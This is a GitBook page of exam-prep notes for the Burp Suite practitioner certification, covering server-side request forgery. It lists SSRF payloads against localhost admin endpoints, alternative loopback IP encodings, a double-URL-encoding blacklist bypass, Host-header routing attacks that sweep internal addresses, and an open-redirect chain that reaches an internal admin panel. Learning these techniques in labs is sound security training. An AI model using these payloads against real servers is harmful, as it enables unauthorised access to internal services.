bscp notes
  • Resources
  • Exam Hints/Tips
  • Burp dynamic header in Intruder
  • Methodology
  • Payloads
  • Stage 1
    • XSS
    • Information disclosure
    • DOM-based
    • Web Cache Poison
    • Host Headers
    • HTTP Req Smuggling
    • Authentication
  • Stage 2
    • oAuth
    • CSRF
    • Password Reset
    • SQLi
      • SQLi Cheat Sheet
    • JWT
    • Prototype Pollution
    • API Testing - TODO
    • Access Control
    • CORS
  • DATA EXFILTRATION
    • XXE Injections
    • SSRF
    • SSTI
    • Path Traversal
    • File Upload
    • Insecure Desarialization
    • OS Cmd Injection
  • graphql api vulns
  • no sql
  • web cache deception
  • clickjacking
  • websockets
  • web cache deception
Powered by GitBook
On this page
  • Bypass blacklist filter
  • Absolute url and localhost Host header
  • Routing host ssrf
  • Open redirection
  1. DATA EXFILTRATION

SSRF

SSRF attack cause the server to make a connection to internal services within the organization, or force the server to connect to arbitrary external systems, potentially leaking sensitive data. Burp scanner may detect SSRF issue as an, External service interaction (HTTP).

SSRF Sample payloads.

/product/nextProduct?currentProductId=6&path=https://EXPLOIT.net  

stockApi=http://localhost:6566/admin  

http://127.1:6566/admin  

Host: localhost

Alternative IP representation of 127.0.0.1:

  1. 2130706433

  2. 017700000001

  3. 127.1

Bypass blacklist filter

Double URL encode characters in URL to Obfuscate the a to %2561, resulting in the bypass of the blacklist filter.

Identify the SSRF in the stockAPI parameter, and bypass the block by changing the URL target localhost and admin endpoint to: http://127.1/%2561dmin.

Absolute url and localhost Host header

GET https://TARGET.net/
Host: OASTIFY.COM

Identify SSRF flawed request parsing vulnerability by changing the HOST header to Collaborator server and providing an absolute URL in the GET request line and observe the response from the Collaborator server.

Routing host ssrf

Identify routing-based SSRF by altering the host header on request and observe the response. Routing-based SSRF via the Host header allow insecure access to a localhost Intranet.

GET / HTTP/1.1
Host: 192.168.0.§0§

!Remember about adding csrf and session cookies

Open redirection

The target make GET request to the next product on the e-commerce site, using a path parameter. On the stockAPI POST request the value provided in body data is the partial path to internal system. See product page source code below.

In this lab they state the admin interface is at http://192.168.0.12:8080/admin but in exam use the localhost:6566.

https://TARGET.net/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin

On the POST stock request, replace the StockAPI value with the partial path, not the absolute URL, from the nextProduct GET request URL as the value of the stockAPI parameter.

stockApi=/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin

PreviousXXE InjectionsNextSSTI

Last updated 5 months ago